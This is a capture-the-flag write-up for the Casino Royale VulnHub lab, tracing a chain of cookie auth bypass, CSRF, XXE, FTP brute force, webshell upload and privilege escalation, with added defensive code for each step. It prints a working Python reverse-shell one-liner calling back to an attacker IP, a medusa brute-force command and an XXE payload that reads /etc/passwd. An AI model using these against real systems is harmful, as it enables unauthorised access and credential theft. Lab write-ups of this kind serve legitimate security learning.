Another James Bond themed CTF challenge from https://www.vulnhub.com/.
Spoilers ahead!
Scanning & Enumeration
Let’s start with a port scan of the target system:
![Nmap scan of 192.168.0.109: FTP (vsftpd), SMTP (Postfix, offering STARTTLS and VRFY), HTTP (Apache httpd 2.4.25 with robots.txt disallowing /cards and /kboard) and a second HTTP service (PHP cli server)](https://www.bordergate.co.uk/wp-content/uploads/2019/03/starting-map-7-70-https-nmap-org-at-2019-03.png)
Nikto highlights some interesting directories to check out:
![Nikto results for 192.168.0.109: missing X-Frame-Options, X-XSS-Protection and X-Content-Type-Options headers, robots.txt entries /cards and /kboard, a KBoard forum under /kboard, and /includes, /install and /phpmyadmin directories found](https://www.bordergate.co.uk/wp-content/uploads/2019/03/nikto-nikto-v2-1-6-target-ip-target-ho.png)
The /install directory shows that PokerMax Pro Poker Software (v0.13) is installed. A quick Google search turns up a public exploit (https://www.exploit-db.com/exploits/6766) that allows you to log in as an administrator simply by adding a cookie.
![PokerMax Poker League installation page at /install/, showing PokerMax Pro Poker Software version v0.13](https://www.bordergate.co.uk/wp-content/uploads/2019/03/pokermax-pro-poker-leagceuro-x-192-168-0-109-i.png)
I used BurpSuite to add the cookie when making the request:
![Burp Suite intercept of GET /pokeradmin/configure.php with the header Cookie: ValidUserAdmin=admin added](https://www.bordergate.co.uk/wp-content/uploads/2019/03/h-vip-history-websockets-history-request-to-http.png)
I was then redirected to the administrator panel without authentication 🙂
![PokerMax Poker League "Configure Settings" admin page, reached without authenticating; it displays the admin username and password in clear text](https://www.bordergate.co.uk/wp-content/uploads/2019/03/mozilla-firefox-pokermax-poker-league-pokerm.png)
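The bypass works because the application trusts a value the browser can set freely. As an added illustration (not PokerMax's code), here is that forgeable check next to a hardened one that only accepts a server-issued, HMAC-signed value; the cookie name comes from the request above, the secret is constructed.

```python
import hashlib
import hmac

COOKIE_NAME = "ValidUserAdmin"       # cookie name from the intercepted request
SECRET = b"constructed-demo-secret"  # constructed; a real deployment loads this from config


def forgeable_is_admin(cookies):
    """The anti-pattern the bypass relies on: a client-controlled value is taken at
    face value. Illustrative only, not PokerMax's actual source."""
    return cookies.get(COOKIE_NAME) == "admin"


def issue_admin_cookie(username, issued_at, secret=SECRET):
    """Set by the server after a successful login. The HMAC covers username and
    issue time, so the browser can present the value but cannot mint or alter it."""
    payload = f"{username}|{issued_at}"
    mac = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{mac}"


def verified_is_admin(cookies, now, secret=SECRET, max_age=3600):
    """Hardened check: MAC valid (constant-time compare), cookie not expired, and
    the authenticated user is the admin account."""
    parts = cookies.get(COOKIE_NAME, "").split("|")
    if len(parts) != 3:
        return False                 # a bare "admin" carries no MAC: rejected
    username, issued_at, mac = parts
    expected = hmac.new(secret, f"{username}|{issued_at}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac.encode(), expected.encode()):
        return False                 # forged or tampered value
    if not issued_at.isdigit() or now - int(issued_at) > max_age:
        return False                 # stale cookie
    return username == "admin"
```

A server-side session store is the more common fix; the signed cookie is shown because it makes the difference from the forgeable check visible in a few lines.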
Once logged in, I could see listings of existing players:
![PokerMax "Manage Poker Players" listing (Felix Leiter, James Bond, Tomelli and others, all added 17 November 2018)](https://www.bordergate.co.uk/wp-content/uploads/2019/03/pokermax-poker-league-z-manage-poker-players-pla.png)
One user profile stood out, due to them having an email address attached:
!["Update Player Information" page for the player Valenka, whose profile notes that casino-royale.local must be added to the local hosts file](https://www.bordergate.co.uk/wp-content/uploads/2019/03/pokermax-poker-league-update-player-information.png)
Cross Site Request Forgery Exploitation
As per the instructions in the user profile, I added a hosts file entry pointing casino-royale.local at the VulnHub system and browsed to the /vip-client-portfolios directory. This shows a SnowFox CMS:
![Snowfox CMS blog listing at casino-royale.local/vip-client-portfolios, including the posts "Casino Royale Event!" and "High-Tech Gadgets"](https://www.bordergate.co.uk/wp-content/uploads/2019/03/snowfox-cms-about-blog-my-account-sorted-by.png)
One post relates to contacting the CMS admin. Another Google search shows that the SnowFox CMS application is vulnerable to Cross Site Request Forgery (https://www.exploit-db.com/exploits/35301).
![Snowfox CMS posts "New Clients - Please Read" (send an email to the CMS admin valenka@casino-royale.local, referencing a known customer in the subject line and including links to relevant information; Valenka checks her email often) and "Site is LIVE! Welcome!"](https://www.bordergate.co.uk/wp-content/uploads/2019/03/new-clients-please-read-if-youve-been-referred.png)
Time to craft the CSRF exploit:
![exploit.html: an HTML form posting to http://casino-royale.local/vip-client-portfolios/?url=admin/accounts/create with hidden inputs verifiedEmail, username, newPassword, confirmPassword, userGroups[], memo, status and formAction=submit](https://www.bordergate.co.uk/wp-content/uploads/2019/03/cat-exploit-html-lessform-actionhttp-casino-roy.png)
Then I sent an email to the target account to persuade them to click the link:
![telnet session to 192.168.0.109 port 25: EHLO, MAIL FROM, RCPT TO valenka, then a message body containing the link to exploit.html; the server answers "250 2.0.0 Ok: queued"](https://www.bordergate.co.uk/wp-content/uploads/2019/03/telnet-192-168-0-109-25-trying-192-168-0-connec.png)
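The forged form succeeds because admin/accounts/create accepts any well-formed POST that arrives with the victim's session cookie. The following is an added example, not Snowfox's code, of the two server-side checks that would have stopped it: a session-bound CSRF token and an Origin/Referer check against casino-royale.local. Field names mirror exploit.html; the values, session ids and secret are constructed.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

SITE_ORIGIN = "http://casino-royale.local"   # origin of the CMS, from the page
SECRET = b"constructed-demo-secret"           # constructed; load from config in a real app

# Field names mirror exploit.html; the values are placeholders.
FORGED_FORM = {"verifiedEmail": "1", "username": "page", "newPassword": "x", "confirmPassword": "x",
               "userGroups[]": "33", "memo": "", "status": "1", "formAction": "submit"}


def issue_csrf_token(session_id, secret=SECRET):
    """Embedded by the server in its own form. Bound to the session via HMAC, so a
    page on another origin cannot compute a matching token."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"

def verify_csrf_token(session_id, token, secret=SECRET):
    nonce, _, mac = token.partition(".")
    expected = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return bool(mac) and hmac.compare_digest(mac.encode(), expected.encode())

def origin_allowed(headers):
    """Independent second check: a cross-site form post carries the attacker's Origin
    or Referer; a missing header is treated as untrusted for state-changing requests."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parsed = urlparse(source)
    return f"{parsed.scheme}://{parsed.netloc}" == SITE_ORIGIN

def handle_account_create(session_id, headers, form):
    """Hardened handler for admin/accounts/create; returns (status, message)."""
    if not origin_allowed(headers):
        return 403, "cross-origin request refused"
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    return 201, f"account {form.get('username')} created"

def demo(session_id="victim-session"):
    """Replays the cross-site post, then the legitimate flow; returns the status codes."""
    legit = dict(FORGED_FORM, csrf_token=issue_csrf_token(session_id))
    return (handle_account_create(session_id, {"Origin": "http://192.168.0.111"}, FORGED_FORM)[0],
            handle_account_create(session_id, {"Origin": SITE_ORIGIN}, FORGED_FORM)[0],
            handle_account_create(session_id, {"Origin": SITE_ORIGIN}, legit)[0],
            handle_account_create("other-session", {"Origin": SITE_ORIGIN}, legit)[0])
```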
With the new admin account created, I could now log in to the CMS as an admin. Whilst reviewing the user profiles, I noticed another web address in the “le” profile:
![Snowfox CMS admin view of the "le" account, whose memo mentions access to /ultra-access-view/main.php](https://www.bordergate.co.uk/wp-content/uploads/2019/03/snowfox-cms-about-username-password-blog-my.png)
XML External Entity Injection
Looking at the source code of this page suggested that it might be vulnerable to XXE:
![](https://www.bordergate.co.uk/wp-content/uploads/2022/07/post_request-500x300.png)
I put together an XXE exploit using BurpSuite, which revealed the “customer” parameter was vulnerable:
![Burp Suite request to /ultra-access-view/main.php declaring an external entity for file:///etc/passwd and referencing it in the "customer" element; the response contains /etc/passwd (including the valenka, postfix and ftp accounts) and an HTML comment reminding someone to update the FTP account password once the front end is finished](https://www.bordergate.co.uk/wp-content/uploads/2019/03/request-params-headers-hex-xml-get-ultra-acces.png)
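The request only works because the parser is allowed to declare and resolve entities. Below is an added example (not the application's code) of a handler for the customer parameter that refuses any DTD before parsing; the <creds><customer> element names and the sample bodies are assumed from the request shown above.

```python
import re
import xml.etree.ElementTree as ET

# Anything that declares a DTD or an entity is refused before a parser sees it;
# the legitimate request for this endpoint needs neither.
DTD_MARKER = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


def handle_customer_request(body):
    """Safe handling of the XML body sent to ultra-access-view/main.php.
    Returns ("ok", customer_name) or ("rejected", reason)."""
    if DTD_MARKER.search(body):
        return "rejected", "DTD or entity declaration present"
    try:
        # stdlib expat: no external entity resolution, so no file or network access
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return "rejected", f"malformed XML: {exc}"
    if root.tag != "creds":                      # element names assumed from the page
        return "rejected", "unexpected root element"
    customer = root.findtext("customer")
    if not customer or not customer.strip():
        return "rejected", "customer element missing"
    return "ok", customer.strip()


# Constructed samples: the shape of the payload shown in the request, and a benign body.
XXE_BODY = (b'<?xml version="1.0"?>'
            b'<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
            b'<creds><customer>&xxe;</customer></creds>')
BENIGN_BODY = b'<?xml version="1.0"?><creds><customer>le</customer></creds>'
```

The PHP-side equivalent is to parse without the LIBXML_NOENT flag (the flag that makes libxml substitute entities) and, on PHP versions before 8, to call libxml_disable_entity_loader(true).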
Brute Forcing
Since the HTML comment in the previous response suggested the FTP user had a weak password, and we now know the username from the /etc/passwd file (ftpUserULTRA), this looked like a good brute force candidate.
```shell
medusa -u ftpUserULTRA -P /usr/share/wordlists/fasttrack.txt -M ftp -h 192.168.0.109 -t 10
```
Credentials: ftpUserULTRA/bankbank
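From the defender's side this step is loud: vsftpd logs every failed login with the username and client address. As an added example, not part of the original write-up, the detector below finds such a burst in constructed vsftpd-style log lines and records whether a successful login followed it.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed vsftpd-style log lines: a burst of failures from one client, then a success.
SAMPLE_LOG = """\
Sat Mar  2 10:40:01 2019 [pid 2101] [ftpUserULTRA] FAIL LOGIN: Client "192.168.0.111"
Sat Mar  2 10:40:01 2019 [pid 2103] [ftpUserULTRA] FAIL LOGIN: Client "192.168.0.111"
Sat Mar  2 10:40:02 2019 [pid 2105] [ftpUserULTRA] FAIL LOGIN: Client "192.168.0.111"
Sat Mar  2 10:40:02 2019 [pid 2107] [ftpUserULTRA] FAIL LOGIN: Client "192.168.0.111"
Sat Mar  2 10:40:02 2019 [pid 2109] [ftpUserULTRA] FAIL LOGIN: Client "192.168.0.111"
Sat Mar  2 10:40:03 2019 [pid 2111] [ftpUserULTRA] FAIL LOGIN: Client "192.168.0.111"
Sat Mar  2 10:40:03 2019 [pid 2113] [ftpUserULTRA] OK LOGIN: Client "192.168.0.111"
Sat Mar  2 10:45:00 2019 [pid 2200] [ftpUserULTRA] FAIL LOGIN: Client "192.168.0.50"
"""

LINE = re.compile(r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
                  r'\[(?P<user>[^\]]+)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')


def detect_bruteforce(log, threshold=5, window_s=60):
    """Return (ip, user, max_failures_in_window, success_after_burst) for every
    client/user pair with at least `threshold` failed logins inside `window_s` seconds.
    A success right after the burst is what separates a guessed password from noise."""
    events = defaultdict(list)
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y").timestamp()
            events[(m["ip"], m["user"])].append((ts, m["result"]))
    alerts = []
    for (ip, user), evs in events.items():
        evs.sort()
        fails = [t for t, r in evs if r == "FAIL"]
        best = start = 0
        for end in range(len(fails)):              # sliding window over failure times
            while fails[end] - fails[start] > window_s:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            succeeded = any(r == "OK" and t >= fails[-1] for t, r in evs)
            alerts.append((ip, user, best, succeeded))
    return alerts
```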
I connected to the FTP server using the credentials gained through brute force. Looking in the FTP directory, there were files that were also accessible from the web server, such as hello_world.pl:
http://casino-royale.local/ultra-access-view/hello_world.pl
![FTP directory listing of the upload location](https://www.bordergate.co.uk/wp-content/uploads/2019/03/dud-idesh-h-ih-hm-h-ah-hd-dooeaided.png)
This made it fairly obvious the aim was to upload a shell. Since existing Perl code was in place, that looked like the best option.
I uploaded /usr/share/webshells/perl/perlcmd.cgi, and used that to execute a reverse netcat shell:
![Netcat listener on port 1234 receiving the reverse shell as www-data (uid 33) after the uploaded perlcmd.cgi was called from the browser](https://www.bordergate.co.uk/wp-content/uploads/2019/03/nc-ivp-1234-listening-on-any-1234-uidz33wm.png)
Privilege Escalation
After poking around for a bit, I could see some interesting files in the /opt/casino-royale directory.
![Listing of /opt/casino-royale: casino-data-collection.py, closer2root.txt, collect.php, index.html, mi6_detect_test, php-web-start.sh, run.sh and user-data.log, including a set-uid binary and group-writable scripts](https://www.bordergate.co.uk/wp-content/uploads/2019/03/total-48-d-rwxrvx-r-x-drwxr-xr-x-4-rw-r-r-.png)
The file casino-data-collection.py was owned by “le” but writable by my current user group (www-data).
I appended a Python reverse shell to the data collection file:
```python
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.111',1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
p=subprocess.call(['/bin/sh','-i']);
```
![Appending the Python reverse shell to casino-data-collection.py as www-data and running it](https://www.bordergate.co.uk/wp-content/uploads/2019/03/www-datacasino-opt-casino-royaledollar-echo-import-s.png)
By calling the file in the webroot, I got another reverse shell as the “le” user:
![Reverse shell received as the "le" user](https://www.bordergate.co.uk/wp-content/uploads/2019/03/c-users-user-bordergate-appdata-local-packages-mi.png)
As per the previous directory listing, “le” was able to write to run.sh, which in turn was invoked from ./mi6_detect_test. The file already contained shell commands, so I added in /bin/sh. This provided a root shell.
![Root shell obtained after adding /bin/sh to run.sh and running ./mi6_detect_test](https://www.bordergate.co.uk/wp-content/uploads/2019/03/c-users-user-bordergate-appdata-local-packages-mi-1.png)
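Both escalation steps rest on the same misconfiguration: a script writable by an unprivileged group is executed by a more privileged program. As an added audit example (not from the write-up), the function below flags group- or world-writable files and set-uid/set-gid binaries; it runs over a constructed stand-in for /opt/casino-royale that reuses the filenames from the listing, with mode bits assumed to match the behaviour described.

```python
import os
import stat
import tempfile


def audit_dir(path):
    """Report regular files that a group or everyone may write to, plus any
    set-uid/set-gid binaries: together they turn an editable script into a
    privilege escalation when the privileged program executes it."""
    findings = []
    for name in sorted(os.listdir(path)):
        st = os.lstat(os.path.join(path, name))
        if not stat.S_ISREG(st.st_mode):
            continue                             # skip directories and symlinks
        if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
            findings.append((name, "setuid/setgid"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((name, "world-writable"))
        elif st.st_mode & stat.S_IWGRP:
            findings.append((name, "group-writable"))
    return findings


def demo():
    """Constructed stand-in for /opt/casino-royale: real filenames, assumed mode bits."""
    files = {
        "casino-data-collection.py": 0o775,  # -rwxrwxr-x : writable by the www-data group
        "index.html": 0o644,                 # -rw-r--r-- : fine
        "mi6_detect_test": 0o6755,           # -rwsr-sr-x : privileged program that calls run.sh
        "run.sh": 0o774,                     # -rwxrwxr-- : writable by le's group
    }
    with tempfile.TemporaryDirectory() as d:
        for name, mode in files.items():
            p = os.path.join(d, name)
            with open(p, "w") as fh:
                fh.write("# constructed placeholder\n")
            os.chmod(p, mode)
        return audit_dir(d)


if __name__ == "__main__":
    for name, reason in demo():
        print(f"{reason:15} {name}")
```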
Looking in the /root/flag directory, a flag script was found. Executing this started another web server …
![Flag script in /root/flag, which starts another web server when executed](https://www.bordergate.co.uk/wp-content/uploads/2019/03/c-users-user-bordergate-appdata-local-packages-mi-2.png)